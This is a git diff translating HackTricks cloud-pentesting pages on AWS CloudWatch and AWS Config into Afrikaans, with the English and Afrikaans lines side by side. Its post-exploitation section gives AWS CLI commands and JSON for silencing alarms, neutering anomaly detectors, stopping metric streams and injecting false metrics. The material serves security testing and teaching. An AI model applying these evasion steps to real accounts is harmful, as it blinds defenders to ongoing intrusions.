+**Inzicht Reëls** stel jou in staat om tendense te identifiseer, pieke te detecteer, of ander patrone van belang in jou metriekdata te identifiseer deur **kragtige wiskundige uitdrukkings** te gebruik om die toestande te definieer waaronder aksies geneem moet word. Hierdie reëls kan jou help om anomalieë of ongewone gedrag in jou hulpbronprestasie en benutting te identifiseer.
 
-**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration.
+**Gemanagte Inzicht Reëls** is vooraf-gekonfigureerde **inzicht reëls wat deur AWS verskaf word**. Hulle is ontwerp om spesifieke AWS dienste of algemene gebruiksgevalle te monitor en kan geaktiveer word sonder om gedetailleerde konfigurasie te benodig.
 
-**Example Use Case**:
+**Voorbeeld Gebruik Geval**:
 
-- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action.
+- Monitering van RDS Prestasie: Aktiveer 'n gemanagte inzicht reël vir Amazon RDS wat sleutelprestasie-indikators soos CPU benutting, geheue gebruik, en skyf I/O monitor. As enige van hierdie metrieke veilige operasionele drempels oorskry, kan die reël 'n waarskuwing of outomatiese mitigasie aksie aktiveer.
 
 ### CloudWatch Logs <a href="#cloudwatch-logs" id="cloudwatch-logs"></a>
 
-Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported.
+Laat toe om **logs van toepassings** en stelsels van **AWS dienste** (insluitend CloudTrail) en **van toepassings/stelsels** (**CloudWatch Agent** kan op 'n gasheer geïnstalleer word) te **aggregeer en te monitor**. Logs kan **onbepaald gestoor** word (afhangende van die Log Groep instellings) en kan uitgevoer word.
 
-**Elements**:
+**Elemente**:
 
-| **Log Group**            | A **collection of log streams** that share the same retention, monitoring, and access control settings                                                     |
+| **Log Groep**            | 'n **versameling van log strome** wat dieselfde retensie, monitering, en toegangbeheer instellings deel                                                     |
 | ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| **Log Stream**           | A sequence of **log events** that share the **same source**                                                                                                |
-| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function |
+| **Log Stroom**           | 'n reeks van **log gebeurtenisse** wat die **dieselfde bron** deel                                                                                                |
+| **Subskripsie Filters** | Definieer 'n **filterpatroon wat gebeurtenisse** in 'n spesifieke log groep pas, stuur dit na Kinesis Data Firehose stroom, Kinesis stroom, of 'n Lambda funksie |
 
-### CloudWatch Monitoring & Events
+### CloudWatch Monitering & Gebeurtenisse
 
-CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\
-In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams)
+CloudWatch **basies** aggregeer data **elke 5min** (die **gedetailleerde** een doen dit **elke 1 min**). Na die aggregasie, **kontroleer dit die drempels van die alarms** in geval dit een moet aktiveer.\
+In daardie geval kan CloudWatch voorberei wees om 'n gebeurtenis te stuur en sommige outomatiese aksies uit te voer (AWS lambda funksies, SNS onderwerpe, SQS rye, Kinesis Strome)
 
-### Agent Installation
+### Agent Installasie
 
-You can install agents inside your machines/containers to automatically send the logs back to CloudWatch.
+Jy kan agente binne jou masjiene/tenks installeer om outomaties die logs terug na CloudWatch te stuur.
 
-- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
-- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
-- **Configure** and **start** the CloudWatch Agent
+- **Skep** 'n **rol** en **heg** dit aan die **instansie** met toestemmings wat CloudWatch toelaat om data van die instansies te versamel benewens om met AWS stelsels bestuurder SSM te kommunikeer (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
+- **Laai** en **installeer** die **agent** op die EC2 instansie ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). Jy kan dit van binne die EC2 aflaai of dit outomaties installeer met AWS Stelsels Bestuurder deur die pakket AWS-ConfigureAWSPackage te kies.
+- **Konfigureer** en **begin** die CloudWatch Agent
 
-A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
-
-## Enumeration
+'n log groep het baie strome. 'n stroom het baie gebeurtenisse. En binne elke stroom is die gebeurtenisse gewaarborg om in volgorde te wees.
 
+## Enumerasie
 ```bash
 # Dashboards #
 
@@ -213,250 +212,217 @@ aws events describe-event-source --name <name>aws events list-replays
 aws events list-api-destinations
 aws events list-event-buses
 ```
-
 ## Post-Exploitation / Bypass
 
 ### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`**
 
-An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents.
-
-In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete.
+'n Aanvaller met hierdie toestemmings kan 'n organisasie se monitering en waarskuwing infrastruktuur aansienlik ondermyn. Deur bestaande alarms te verwyder, kan 'n aanvaller noodsaaklike waarskuwings deaktiveer wat administrateurs in kennis stel van kritieke prestasieprobleme, sekuriteitsbreuke of operasionele mislukkings. Verder, deur metrieksalarms te skep of te wysig, kan die aanvaller ook administrateurs mislei met vals waarskuwings of wettige alarms stilmaak, wat effektief kwaadwillige aktiwiteite verberg en tydige reaksies op werklike voorvalle voorkom.
 
+Boonop, met die **`cloudwatch:PutCompositeAlarm`** toestemming, sal 'n aanvaller in staat wees om 'n lus of siklus van saamgestelde alarms te skep, waar saamgestelde alarm A afhanklik is van saamgestelde alarm B, en saamgestelde alarm B ook afhanklik is van saamgestelde alarm A. In hierdie scenario is dit nie moontlik om enige saamgestelde alarm wat deel van die siklus is, te verwyder nie, omdat daar altyd steeds 'n saamgestelde alarm is wat afhanklik is van daardie alarm wat jy wil verwyder.
 ```bash
 aws cloudwatch put-metric-alarm --cli-input-json <value> | --alarm-name <value> --comparison-operator <value> --evaluation-periods <value> [--datapoints-to-alarm <value>] [--threshold <value>] [--alarm-description <value>] [--alarm-actions <value>] [--metric-name <value>] [--namespace <value>] [--statistic <value>] [--dimensions <value>] [--period <value>]
 aws cloudwatch delete-alarms --alarm-names <value>
 aws cloudwatch put-composite-alarm --alarm-name <value> --alarm-rule <value> [--no-actions-enabled | --actions-enabled [--alarm-actions <value>] [--insufficient-data-actions <value>] [--ok-actions <value>] ]
 ```
+Die volgende voorbeeld toon hoe om 'n metriek alarm ondoeltreffend te maak:
 
-The following example shows how to make a metric alarm ineffective:
-
-- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic.
-- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm.
+- Hierdie metriek alarm monitor die gemiddelde CPU benutting van 'n spesifieke EC2 instance, evalueer die metriek elke 300 sekondes en vereis 6 evaluasieperiodes (30 minute in totaal). As die gemiddelde CPU benutting 60% oorskry vir ten minste 4 van hierdie periodes, sal die alarm geaktiveer word en 'n kennisgewing na die gespesifiseerde SNS onderwerp stuur.
+- Deur die Drempel aan te pas om meer as 99% te wees, die Periode op 10 sekondes in te stel, die Evaluasieperiodes op 8640 (aangesien 8640 periodes van 10 sekondes gelyk is aan 1 dag), en die Datapunte na Alarm ook op 8640, sal dit nodig wees dat die CPU benutting oor 99% moet wees elke 10 sekondes deur die hele 24-uur periode om 'n alarm te aktiveer.
 
 {{#tabs }}
 {{#tab name="Original Metric Alarm" }}
-
 ```json
 {
-  "Namespace": "AWS/EC2",
-  "MetricName": "CPUUtilization",
-  "Dimensions": [
-    {
-      "Name": "InstanceId",
-      "Value": "i-01234567890123456"
-    }
-  ],
-  "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"],
-  "ComparisonOperator": "GreaterThanThreshold",
-  "DatapointsToAlarm": 4,
-  "EvaluationPeriods": 6,
-  "Period": 300,
-  "Statistic": "Average",
-  "Threshold": 60,
-  "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%",
-  "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization"
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-01234567890123456"
+}
+],
+"AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"],
+"ComparisonOperator": "GreaterThanThreshold",
+"DatapointsToAlarm": 4,
+"EvaluationPeriods": 6,
+"Period": 300,
+"Statistic": "Average",
+"Threshold": 60,
+"AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%",
+"AlarmName": "EC2 instance i-01234567890123456 CPU Utilization"
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Modified Metric Alarm" }}
-
+{{#tab name="Gewysigde Metriek Alarm" }}
 ```json
 {
-  "Namespace": "AWS/EC2",
-  "MetricName": "CPUUtilization",
-  "Dimensions": [
-    {
-      "Name": "InstanceId",
-      "Value": "i-0645d6d414dadf9f8"
-    }
-  ],
-  "AlarmActions": [],
-  "ComparisonOperator": "GreaterThanThreshold",
-  "DatapointsToAlarm": 8640,
-  "EvaluationPeriods": 8640,
-  "Period": 10,
-  "Statistic": "Average",
-  "Threshold": 99,
-  "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold",
-  "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization"
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-0645d6d414dadf9f8"
+}
+],
+"AlarmActions": [],
+"ComparisonOperator": "GreaterThanThreshold",
+"DatapointsToAlarm": 8640,
+"EvaluationPeriods": 8640,
+"Period": 10,
+"Statistic": "Average",
+"Threshold": 99,
+"AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold",
+"AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization"
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+**Potensiële Impak**: Gebrek aan kennisgewings vir kritieke gebeurtenisse, potensiële onopgemerkte probleme, vals waarskuwings, onderdruk werklike waarskuwings en moontlik gemiste opsporings van werklike voorvalle.
 
 ### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`**
 
-By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response.
+Deur alarm aksies te verwyder, kan die aanvaller kritieke waarskuwings en geoutomatiseerde reaksies voorkom wanneer 'n alarmtoestand bereik word, soos om administrateurs te kennisgewing of om outo-skaalaktiwiteite te aktiveer. Onbehoorlike aktivering of heraktivering van alarm aksies kan ook lei tot onverwagte gedrag, hetsy deur voorheen gedeaktiveerde aksies te heraktiveer of deur te verander watter aksies geaktiveer word, wat moontlik verwarring en misleiding in voorvalreaksie kan veroorsaak.
 
-In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures.
-
-- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration.
+Boonop kan 'n aanvaller met die toestemming alarmtoestande manipuleer, in staat om vals alarms te skep om administrateurs te aflei en te verwarr, of om werklike alarms te stil om aanhoudende kwaadwillige aktiwiteite of kritieke stelselfoute te verberg.
 
+- As jy **`SetAlarmState`** op 'n saamgestelde alarm gebruik, is dit nie gewaarborg dat die saamgestelde alarm na sy werklike toestand terugkeer nie. Dit keer terug na sy werklike toestand slegs wanneer enige van sy kinderalarms toestand verander. Dit word ook herbeoordeel as jy sy konfigurasie opdateer.
 ```bash
 aws cloudwatch disable-alarm-actions --alarm-names <value>
 aws cloudwatch enable-alarm-actions --alarm-names <value>
 aws cloudwatch set-alarm-state --alarm-name <value> --state-value <OK | ALARM | INSUFFICIENT_DATA> --state-reason <value> [--state-reason-data <value>]
 ```
-
-**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+**Potensiële Impak**: Gebrek aan kennisgewings vir kritieke gebeurtenisse, potensiële onopgemerkte probleme, vals waarskuwings, onderdruk werklike waarskuwings en moontlik gemiste opsporings van werklike voorvalle.
 
 ### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`**
 
-An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring.
-
+'n Aanvaller sou in staat wees om die vermoë om ongebruikelijke patrone of anomalieë in metrieke data op te spoor en daarop te reageer, te kompromitteer. Deur bestaande anomaliedetektore te verwyder, kan 'n aanvaller kritieke waarskuwingmeganismes deaktiveer; en deur hulle te skep of te wysig, sou dit in staat wees om ofwel verkeerd te konfigureer of vals positiewe te skep om die monitering te aflei of te oorweldig.
 ```bash
 aws cloudwatch delete-anomaly-detector [--cli-input-json <value> | --namespace <value> --metric-name <value> --dimensions <value> --stat <value>]
 aws cloudwatch put-anomaly-detector [--cli-input-json <value> | --namespace <value> --metric-name <value> --dimensions <value> --stat <value> --configuration <value> --metric-characteristics <value>]
 ```
-
-The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period.
+Die volgende voorbeeld toon hoe om 'n metrieke anomaliedetektor ondoeltreffend te maak. Hierdie metrieke anomaliedetektor monitor die gemiddelde CPU-gebruik van 'n spesifieke EC2-instantie, en net deur die “ExcludedTimeRanges” parameter met die gewenste tydsbereik by te voeg, sal dit genoeg wees om te verseker dat die anomaliedetektor nie enige relevante data gedurende daardie tydperk analiseer of waarsku nie.
 
 {{#tabs }}
 {{#tab name="Original Metric Anomaly Detector" }}
-
 ```json
 {
-  "SingleMetricAnomalyDetector": {
-    "Namespace": "AWS/EC2",
-    "MetricName": "CPUUtilization",
-    "Stat": "Average",
-    "Dimensions": [
-      {
-        "Name": "InstanceId",
-        "Value": "i-0123456789abcdefg"
-      }
-    ]
-  }
+"SingleMetricAnomalyDetector": {
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Stat": "Average",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-0123456789abcdefg"
+}
+]
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Modified Metric Anomaly Detector" }}
-
+{{#tab name="Gewysigde Metriek Anomalie Detektor" }}
 ```json
 {
-  "SingleMetricAnomalyDetector": {
-    "Namespace": "AWS/EC2",
-    "MetricName": "CPUUtilization",
-    "Stat": "Average",
-    "Dimensions": [
-      {
-        "Name": "InstanceId",
-        "Value": "i-0123456789abcdefg"
-      }
-    ]
-  },
-  "Configuration": {
-    "ExcludedTimeRanges": [
-      {
-        "StartTime": "2023-01-01T00:00:00Z",
-        "EndTime": "2053-01-01T23:59:59Z"
-      }
-    ],
-    "Timezone": "Europe/Madrid"
-  }
+"SingleMetricAnomalyDetector": {
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Stat": "Average",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-0123456789abcdefg"
+}
+]
+},
+"Configuration": {
+"ExcludedTimeRanges": [
+{
+"StartTime": "2023-01-01T00:00:00Z",
+"EndTime": "2053-01-01T23:59:59Z"
+}
+],
+"Timezone": "Europe/Madrid"
+}
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact**: Direct effect in the detection of unusual patterns or security threats.
+**Potensiële Impak**: Direkte effek op die opsporing van ongewone patrone of sekuriteitsbedreigings.
 
 ### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`**
 
-An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities.
-
+'n Aanvaller sou in staat wees om die monitering en visualisering vermoëns van 'n organisasie te kompromitteer deur sy dashboards te skep, te wysig of te verwyder. Hierdie toestemmings kan benut word om kritieke sigbaarheid in die prestasie en gesondheid van stelsels te verwyder, dashboards te verander om verkeerde data te vertoon of kwaadwillige aktiwiteite te verberg.
 ```bash
 aws cloudwatch delete-dashboards --dashboard-names <value>
 aws cloudwatch put-dashboard --dashboard-name <value> --dashboard-body <value>
 ```
-
-**Potential Impact**: Loss of monitoring visibility and misleading information.
+**Potensiële Impak**: Verlies van moniteringssigbaarheid en misleidende inligting.
 
 ### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`**
 
-Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team.
-
+Insight-reëls word gebruik om anomalieë te detecteer, prestasie te optimaliseer en hulpbronne effektief te bestuur. Deur bestaande insight-reëls te verwyder, kan 'n aanvaller kritieke moniteringsvermoëns verwyder, wat die stelsel blind laat vir prestasieprobleme en sekuriteitsbedreigings. Boonop kan 'n aanvaller insight-reëls skep of wysig om misleidende data te genereer of kwaadwillige aktiwiteite te verberg, wat lei tot onakkurate diagnosering en onvanpaste reaksies van die operasiespan.
 ```bash
 aws cloudwatch delete-insight-rules --rule-names <value>
 aws cloudwatch put-insight-rule --rule-name <value> --rule-definition <value> [--rule-state <value>]
 aws cloudwatch put-managed-insight-rules --managed-rules <value>
 ```
-
-**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures.
+**Potensiële Impak**: Moeilikheid om prestasieprobleme en anomalië op te spoor en daarop te reageer, verkeerd ingeligte besluitneming en moontlik die verborge van kwaadwillige aktiwiteite of stelselfoute.
 
 ### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`**
 
-By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity.
-
+Deur kritieke insigreëls te deaktiveer, kan 'n aanvaller die organisasie effektief blind maak vir sleutelprestasie- en sekuriteitsmetrieks. Omgekeerd, deur misleidende reëls in te skakel of te konfigureer, kan dit moontlik wees om valse data te genereer, geraas te skep, of kwaadwillige aktiwiteit te verberg.
 ```bash
 aws cloudwatch disable-insight-rules --rule-names <value>
 aws cloudwatch enable-insight-rules --rule-names <value>
 ```
-
-**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts.
+**Potensiële Impak**: Verwarring onder die operasiespan, wat lei tot vertraagde reaksies op werklike probleme en onnodige aksies gebaseer op valse waarskuwings.
 
 ### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`**
 
-An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity:
+'n Aanvaller met die **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** toestemmings sou in staat wees om metriekdata-strome te skep en te verwyder, wat die sekuriteit, monitering en data-integriteit in gevaar stel:
 
-- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations.
-- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues.
-- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden.
-
-Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless.
+- **Skep kwaadwillige strome**: Skep metriekstrome om sensitiewe data na ongeoorloofde bestemmings te stuur.
+- **Hulpbronmanipulasie**: Die skep van nuwe metriekstrome met oormatige data kan baie geraas veroorsaak, wat onakkurate waarskuwings veroorsaak en werklike probleme verdoesel.
+- **Moniteringonderbreking**: Deur metriekstrome te verwyder, sou aanvallers die deurlopende vloei van moniteringsdata onderbreek. Op hierdie manier sou hul kwaadwillige aktiwiteite effektief verborge wees.
 
+Op soortgelyke wyse, met die **`cloudwatch:PutMetricData`** toestemming, sou dit moontlik wees om data aan 'n metriekstroom toe te voeg. Dit kan lei tot 'n DoS as gevolg van die hoeveelheid onvanpaste data wat bygevoeg word, wat dit heeltemal nutteloos maak.
 ```bash
 aws cloudwatch delete-metric-stream --name <value>
 aws cloudwatch put-metric-stream --name <value> [--include-filters <value>] [--exclude-filters <value>] --firehose-arn <value> --role-arn <value> --output-format <value>
 aws cloudwatch put-metric-data --namespace <value> [--metric-data <value>] [--metric-name <value>] [--timestamp <value>] [--unit <value>] [--value <value>] [--dimensions <value>]
 ```
-
-Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance:
-
+Voorbeeld van die toevoeging van data wat ooreenstem met 'n 70% CPU benutting oor 'n gegewe EC2 instance:
 ```bash
 aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg"
 ```
-
-**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams.
+**Potensiële Impak**: Onderbreking in die vloei van moniteringsdata, wat die opsporing van afwykings en voorvalle beïnvloed, hulpbronmanipulasie en koste wat toeneem as gevolg van die skep van oortollige metriekstrome.
 
 ### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`**
 
-An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams.
-
+'n Aanvaller sou die vloei van die geaffekteerde metriekdata-strome beheer (elke datastroom as daar geen hulpbronbeperking is nie). Met die toestemming **`cloudwatch:StopMetricStreams`**, kan aanvallers hul kwaadwillige aktiwiteite verberg deur kritieke metriekstrome te stop.
 ```bash
 aws cloudwatch stop-metric-streams --names <value>
 aws cloudwatch start-metric-streams --names <value>
 ```
-
-**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents.
+**Potensiële Impak**: Onderbreking in die vloei van moniteringsdata, wat die opsporing van anomalieë en voorvalle beïnvloed.
 
 ### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`**
 
-An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags.
-
+'n Aanvaller sal in staat wees om etikette by CloudWatch hulpbronne (huidiglik slegs alarms en Contributor Insights reëls) te voeg, te wysig of te verwyder. Dit kan jou organisasie se toegangbeheerbeleide op grond van etikette onderbreek.
 ```bash
 aws cloudwatch tag-resource --resource-arn <value> --tags <value>
 aws cloudwatch untag-resource --resource-arn <value> --tag-keys <value>
 ```
+**Potensiële Impak**: Ontwrichting van etiket-gebaseerde toegangbeheerbeleide.
 
-**Potential Impact**: Disruption of tag-based access control policies.
-
-## References
+## Verwysings
 
 - [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html)
 - [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
index f2ab3c4c5..d0ec9a412 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
@@ -4,47 +4,43 @@
 
 ## AWS Config
 
-AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**.
+AWS Config **vang hulpbron veranderinge**, so enige verandering aan 'n hulpbron wat deur Config ondersteun word, kan geregistreer word, wat **sal registreer wat verander het saam met ander nuttige metadata, alles gehou binne 'n lêer bekend as 'n konfigurasie-item**, 'n CI. Hierdie diens is **streekspesifiek**.
 
-A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
+'n Konfigurasie-item of **CI** soos dit bekend staan, is 'n sleutelkomponent van AWS Config. Dit bestaan uit 'n JSON-lêer wat **die konfigurasie-inligting, verhouding-inligting en ander metadata as 'n punt-in-tyd snapshot van 'n ondersteunde hulpbron hou**. Alle inligting wat AWS Config vir 'n hulpbron kan registreer, word binne die CI vasgevang. 'n CI word **elke keer** geskep wanneer 'n ondersteunde hulpbron 'n verandering aan sy konfigurasie maak. Benewens die registrasie van die besonderhede van die betrokke hulpbron, sal AWS Config ook CIs vir enige direk verwante hulpbronne registreer om te verseker dat die verandering nie daardie hulpbronne ook beïnvloed het nie.
 
-- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource.
-- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
-- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
-- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
-- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
+- **Metadata**: Bevat besonderhede oor die konfigurasie-item self. 'n Weergawe-ID en 'n konfigurasie-ID, wat die CI uniek identifiseer. Ander inligting kan 'n MD5Hash insluit wat jou toelaat om ander CIs wat reeds teen dieselfde hulpbron geregistreer is, te vergelyk.
+- **Attributes**: Dit hou algemene **attribuutinligting teen die werklike hulpbron**. Binne hierdie afdeling het ons ook 'n unieke hulpbron-ID, en enige sleutelwaarde-tags wat aan die hulpbron geassosieer is. Die hulpbron tipe word ook gelys. Byvoorbeeld, as dit 'n CI vir 'n EC2-instantie was, kan die hulpbron tipe wat gelys word die netwerkinterfaan, of die elastiese IP-adres vir daardie EC2-instantie wees.
+- **Relationships**: Dit hou inligting vir enige gekonnekteerde **verhouding wat die hulpbron mag hê**. So binne hierdie afdeling, sal dit 'n duidelike beskrywing van enige verhouding met ander hulpbronne wat hierdie hulpbron gehad het, toon. Byvoorbeeld, as die CI vir 'n EC2-instantie was, kan die verhouding afdeling die verbinding met 'n VPC saam met die subnet wat die EC2-instantie woon, toon.
+- **Current configuration:** Dit sal dieselfde inligting vertoon wat gegenereer sou word as jy 'n beskrywing of lys API-oproep deur die AWS CLI sou uitvoer. AWS Config gebruik dieselfde API-oproepe om dieselfde inligting te verkry.
